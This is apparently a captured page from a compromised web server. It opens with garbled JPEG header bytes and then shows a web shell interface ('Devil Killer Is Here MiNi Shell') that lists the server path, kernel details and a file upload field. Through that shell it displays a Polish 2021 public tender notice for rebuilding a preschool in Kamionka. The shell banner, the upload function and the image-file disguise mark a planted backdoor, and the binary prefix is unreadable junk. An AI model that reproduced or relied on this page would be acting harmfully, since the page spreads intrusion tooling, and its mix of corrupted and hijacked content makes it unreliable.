JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20211108/0026054901-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa i remont budynku dla uzyskania zmiany sposobu jego użytkowania z punktu przedszkolnego na przedszkole w Kamionce, gmina Kozłów </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZESPÓŁ SZKOLNO-PRZEDSZKOLNY W KOZŁOWIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 386792631</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">303</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kozłów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-241</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL214 - Krakowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(41) 38 41 048 wew. 41</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">(41) 384 10 10</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zspprzetargi@kozlow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.malopolska.pl/zspkozlow</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa i remont budynku dla uzyskania zmiany sposobu jego użytkowania z punktu przedszkolnego na przedszkole w Kamionce, gmina Kozłów </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-08af687e-4074-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00260549</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00115081/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Przebudowa i remont budynku dla uzyskania zmiany sposobu jego użytkowania z punktu przedszkolnego na przedszkole w Kamionce gm. Kozłów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.malopolska.pl/zspkozlow,m,393689,2021.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">platforma miniPortal: https://miniportal.uzp.gov.pl/, zintegrowana z platformą ePUAP – https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Wymagania technicznej dot. komunikacji elektronicznej:<br/>A.	platforma miniPortal (zintegrowana z platformą ePUAP) – także dla składania ofert:<br/>a.	dysponowanie kontem na platformie ePUAP, <br/>b.	dysponowanie urządzeniem teleinformatycznym z dostępem do sieci Internet, <br/>c.	dysponowanie dostępem do nowoczesnej przeglądarki internetowej wspierającej HTML5, CSS3 i JavaScript, <br/>d.	maksymalny rozmiar plików: 150 MB, <br/><br/>B.	poczta elektroniczna:<br/>a.	dysponowanie urządzeniem teleinformatycznym z dostępem do sieci Internet,<br/>b.	dysponowanie dostępem do nowoczesnej przeglądarki internetowej wspierającej HTML5, CSS3 i JavaScript,<br/>c.	posiadanie konta poczty elektronicznej, <br/>d.	maksymalny rozmiar plików: 20 MB. <br/><br/>2.	Wymagania techniczne dot. składania ofert:<br/>Wykonawca zamierzający wziąć udział w postępowaniu musi posiadać aktywne konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku”. <br/>Ofertę składa się za pośrednictwem platformy miniPortal, zintegrowanej z platformą ePUAP z wykorzystaniem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku”, po jej uprzednim podpisaniu i zaszyfrowaniu. Funkcjonalność do zaszyfrowania oferty przez Wykonawcę dostępna jest na platformie miniPortal, w „Szczegółach postępowania”. Szczegółowy sposób złożenia oferty, w tym jej zaszyfrowania, opisany został w „Instrukcji użytkownika” platformy miniPortal: https://miniportal.uzp.gov.pl/Instrukcja_uzytkownika_miniPortal-ePUAP.pdf.<br/>3.	Formy dokumentów:<br/>a.	forma oferta: oferta sporządzona pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej z podpisem zaufanym lub podpisem osobistym, <br/>b.	forma oświadczeń z art. 125 ust. 1 Pzp: oświadczenia sporządzane pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej z podpisem zaufanym lub podpisem osobistym,<br/>c.	forma pozostałych oświadczeń i dokumentów: zgodnie z Rozporządzeniem Prezesa Rady Ministrów z 30.12.2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie,<br/>d.	format ofert, oświadczeń dokumentów: zgodnie z Załącznikiem nr 2 do Rozporządzenia Rady Ministrów z 12.4.2012 r. w sprawie krajowych ram interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów informatycznych, z zastrzeżeniem wyrażenia treści oferty, oświadczenia lub dokumentu przy użyciu wyrazów, cyfr lub innych znaków pisarskich, które można odczytać i powielić i których układ nie pozostawia wątpliwości co do treści i kontekstu zapisanych informacji. <br/><br/>4.	Data odbioru korespondencji z wykorzystaniem:<br/>a.	platformy miniPortal, zintegrowanej z platformą ePUAP – data jej wpływu na elektroniczną skrzynkę podawczą Zamawiającego, <br/>b.	b. poczty elektronicznej – data jej wpływu na skrzynkę pocztową Zamawiającego.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)(Dz. Urz. UE L 119 z 04 maja 2016 r., str. 1 – „RODO”) Zamawiający informuje, iż administratorem danych osobowych jest Dyrektor Zespołu Szkolno-Przedszkolnego w Kozłowie, Kozłów 303, 32-241 Kozłów. <br/>2.	Dane inspektora ochrony danych osobowych: Inspektor Ochrony Danych Osobowych Zespołu Szkolno-Przedszkolnego w Kozłowie, Kozłów 3030, 32-241 Kozłów, e-mail: gzskozlow@gmail.com. <br/>3.	Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z prowadzeniem postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięciem, jak również udokumentowania postępowania o udzielenie zamówienia i jego archiwizacji.<br/>4.	Odbiorcami danych osobowych są podmioty, którym dokumentacja postępowania zostanie udostępniona w oparciu o przepisy PZP. <br/>5.	Dane osobowe pozyskane w związku z prowadzeniem postępowania o udzielenie zamówienia publicznego będą przechowywane, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy w sprawie zamówienia publicznego. <br/>6.	Niezależnie od postanowień ust. 5 powyżej, w przypadku zawarcia umowy w sprawie zamówienia publicznego, dane osobowe będą przetwarzane do upływu okresu przedawnienia roszczeń wynikających z umowy w sprawie zamówienia publicznego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1.	Osoba, której dotyczą pozyskane w związku z prowadzeniem niniejszego postępowania dane osobowe, ma prawo: <br/>a.	dostępu do swoich danych osobowych – zgodnie z art. 15 RODO, przy czym w sytuacji, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1 – 3 RODO wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy, daty lub numeru referencyjnego bieżącego bądź zakończonego postępowania o udzielenie zamówienia publicznego, <br/>b.	do sprostowana swoich danych osobowych – zgodnie z art. 16 RODO, przy czym skorzystanie z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego, ani zmianą postanowień umowy w zakresie niezgodnym z Pzp oraz nie może naruszać integralności protokołu oraz jego załączników, <br/>c.	do żądania od Zamawiającego, jako administratora, ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego. Prawo to nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego, <br/>d. wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych w przypadku uznania, że przetwarzanie jej danych osobowych narusza przepisy o ochronie danych osobowych, w tym przepisy RODO.<br/>2. Obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. Konsekwencje niepodania określonych danych określa PZP. <br/>3.	Osobie, której dane osobowe zostały pozyskane przez Zamawiającego w związku z prowadzeniem postępowania o udzielenie zamówienia publicznego nie przysługuje:<br/>a.	prawo do usunięcia danych osobowych, <br/>b.	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO, <br/>c.	określone w art. 21 RODO prawo sprzeciwu wobec przetwarzania danych osobowych, a to z uwagi na fakt, że podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>4.	Dane osobowe mogą być przekazywane do organów publicznych i urzędów państwowych lub innych podmiotów upoważnionych na podstawie przepisów prawa lub wykonujących zadania realizowane w interesie publicznym lub w ramach sprawowania władzy publicznej, w szczególności do podmiotów prowadzących działalność kontrolną wobec Zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZSP.271.1.11.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest przebudowa i remont budynku punktu przedszkolnego położnego na działce nr 10 w miejscowości Kamionka, gmina Kozłów, dla uzyskania zmiany sposobu jego użytkowania z punktu przedszkolnego na przedszkole. <br/>2.	Przedmiot zamówienia został opisany w podziale na dwie części odnoszące się – odpowiednio – do robót w obrębie budynku punktu przedszkolnego i w obrębie dojścia (w dokumentacji projektowej opisane jako Etap I) oraz do robót w obrębie zagospodarowania terenu (w dokumentacji projektowej jako Etap II). <br/>Uwaga! Pomimo opisu przedmiotu zamówienia w podziale na części, przedmiotem zamówienia jest realizacja całości robót budowalnych objętych dokumentacją projektową dla Etapu I i dla Etapu II, które będą realizowane w tym samym lub zbliżonym czasie, w oparciu o harmonogram realizacji prac uzgodniony przez Strony.<br/>Brak podziału zamówienia na części, w szczególności na część odpowiadającą robotom w obrębie budynku i w obrębie dojścia oraz na część odpowiadającą robotom w obrębie zagospodarowania terenu podyktowana jest celem inwestycji, tj. zmianą przeznaczenia budynku z punktu przedszkolnego na przedszkole, którego realizacja wymaga kompleksowego wykonania robót w obrębie budynku i w obrębie dojścia oraz w obrębie zagospodarowania terenu. W szczególności nie jest możliwe uzyskanie zmiany sposobu użytkowania budynku bez wykonania i odbioru drogi pożarowej realizowanej w obrębie zagospodarowania terenu. Podział zamówienia na części powoduje ryzyko braku wyłonienia Wykonawcy na jedną z części. Realizacja wyłącznie jednej części zamówienia nie odpowiada natomiast celowi inwestycji. Podobnie konieczność ponownego przeprowadzenia procedury udzielenia zamówienia dla jednej części mogłaby spowodować wyłonienie Wykonawcy w terminie uniemożliwiającym zrealizowanie inwestycji zgodnie z treścią umowy o dofinansowanie. To z kolei spowodowałoby konieczność rezygnacji z realizacji całości inwestycji. <br/>3.	Przedmiot zamówienia obejmuje:<br/>A.	Roboty w obrębie budynku i w obrębie dojścia, w ramach których Wykonawca zobowiązany jest, w szczególności do: <br/>- w zakresie robót ogólnobudowlanych:<br/>a.	wykonania robót wykończeniowych (m.in. wykonanie ścian działowych w celu uzyskania m.in. pomieszczenia socjalnego i pomieszczenia sanitarnego ogólnodostępnego przystosowanego do potrzeb osób niepełnosprawnych, wykonanie tynków wewnętrznych ścian i sufitów, wykonanie posadzek, malowanie, przebudowa schodów wewnętrznych, remont schodów zewnętrznych, wykonanie robót w celu spełnienia obowiązujących wymagań p.poż, w tym wykonanie elementów doświetlenia pomieszczeń w zakresie bezpieczeństwa pożarowego i doświetlenia pomieszczeń, <br/>b.	wykonania termomodernizacji ścian, <br/>c.	wykonania termomodernizacji stropodachu, <br/>d.	wykonania opaski wokół budynku, <br/>e.	wymiany stolarki okiennej i drzwiowej, <br/>-	w zakresie branży sanitarnej:<br/>d.	wykonania instalacji centralnego ogrzewania opartego na pompie ciepła typu powietrze – woda poprzez: wymianę źródła ciepła, rurociągów, armatury i grzejników,<br/>e.	zmiany źródła ciepłej wody na pojemnościowy zasobnik elektryczny, <br/>f.	wykonania instalacji hydrantowej wewnętrznej, <br/>g.	wykonanie instalacji wod-kan w łazience przeznaczonej dla osób niepełnosprawnych i pomieszczeniu socjalnym, wyposażenie łazienki i pomieszczenia socjalnego, <br/>-	w zakresie branży elektrycznej:<br/>h.	wykonania instalacji elektrycznej wewnętrznej – wymiana opraw oświetleniowych, osprzętu, przewodów, wykonanie połączeń wyrównawczych, przeniesienie układu pomiarowego na słup, <br/>i.	wykonania instalacji przyzywowej, <br/>j.	wykonania instalacji internetowej,<br/>k.	wykonania kompletnej instalacji fotowoltaicznej na dachu budynku, <br/>l.	wykonania instalacji odgromowej, <br/>m.	wykonania uziomów. <br/><br/>B.	Roboty w obrębie zagospodarowania terenu, w ramach których Wykonawcy zobowiązany jest, w szczególności do:<br/>a.	wykonania ogrodzenia – wymiana części ogrodzenia od frontu działki oraz wzdłuż granic działki, naprawa pozostałej części ogrodzenia (z wykorzystaniem elementów odzyskanych od strony frontowej i bocznych), montaż nowej bramy wjazdowej i nowej furtki wejściowej, <br/>b.	wykonania utwardzonych dojść, w tym wydzielenia drogi pożarowej i placu p.poż do zawracania,<br/>c.	wyznaczenia miejsc parkingowych, w tym stanowiska przystosowanego do potrzeb osób niepełnosprawnych. <br/>4.	Szczegółowy opis przedmiotu zamówienia określa: <br/>A.	dla Robót w obrębie budynku i w obrębie dojścia:<br/>-	dokumentacja projektowa, na którą składają się: projekt budowlany wraz z decyzją pozwolenia na budowę i specyfikacje techniczne wykonania i odbioru robót (STWiOR), stanowiąca Załącznik nr 8 do SWZ, z zastrzeżeniem, że zakres robót nie obejmuje:<br/>a.	wykonania ogrodzenia (realizacja w ramach Robót w obrębie zagospodarowania terenu)<br/>b.	wykonania utwardzonych dojść, w tym wydzielenia drogi pożarowej i placu p.poż do zawracania (realizacja w ramach Robót w obrębie zagospodarowania terenu), <br/>c.	wyznaczenia miejsc parkingowych, w tym stanowiska przystosowanego do potrzeb osób niepełnosprawnych (realizacja w ramach Robót w obrębie zagospodarowania terenu), <br/>d.	wykonania stojaka rowerowego (poza zakresem), <br/>e.	wykonania zieleni dekoracyjno-ozdobnej (poza zakresem), <br/>f.	wyposażenia w: szafy służące do przechowywania środków czystości; szafki do przechowywania odzieży wierzchniej w szatniach; urządzenia umożliwiające odpoczynek i spożywanie posiłków, w tym blaty i szafki służące do przechowywania naczyń, miejsca siedzące, wieszaki na odzież wierzchnią i inne podobne urządzenia w pomieszczeniu socjalnym (poza zakresem), <br/>a nadto pomocniczo:<br/>-	przedmiary robót stanowiące Załącznik nr 8A do SWZ, z zastrzeżeniem, że ewentualne braki przedmiarów w zakresie robót lub materiałów niezbędnych do ich wykonania wskazanych w dokumentacji projektowej jako roboty do wykonania nie zwalnia Wykonawcy z realizacji tych robót lub zakupu materiałów niezbędnych do ich wykonania, chyba że SWZ stanowi inaczej, <br/><br/>B.	dla Robót w obrębie zagospodarowania terenu:<br/>-	dokumentacja projektowa, na którą składają się: projekt budowlany i specyfikacje techniczne wykonania i odbioru robót (STWiOR) stanowiąca Załącznik nr 9 do SWZ, z zastrzeżeniem, że zakres robót nie obejmuje:<br/>a.	wykonania linii zasilającej energetycznej, <br/>b.	wykonania rury OPTO, <br/>c.	wykonania złącza kablowo-pomiarowego, <br/>d.	wykonania stojaka na rowery (poza zakresem), <br/>e.	demontażu istniejącego słupa energetycznego, <br/>f.	wykonania opaski wokół budynku, <br/>g.	wykonania zieleni dekoracyjno-ozdobnej (poza zakresem),<br/>a nadto pomocniczo: <br/>-	przedmiar robót stanowiący Załącznik nr 9A do SWZ, z zastrzeżeniem, że ewentualne braki przedmiaru w zakresie robót lub materiałów niezbędnych do ich wykonania wskazanych w dokumentacji projektowej jako roboty do wykonania nie zwalnia Wykonawcy z realizacji tych robót lub zakupu materiałów niezbędnych do ich wykonania, chyba że SWZ stanowi inaczej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09331200-0 - Słoneczne moduły fotoelektryczne</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek udziału w postępowaniu dot. zdolności technicznej lub zawodowej:<br/><br/>Wykonawca musi wykazać, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres 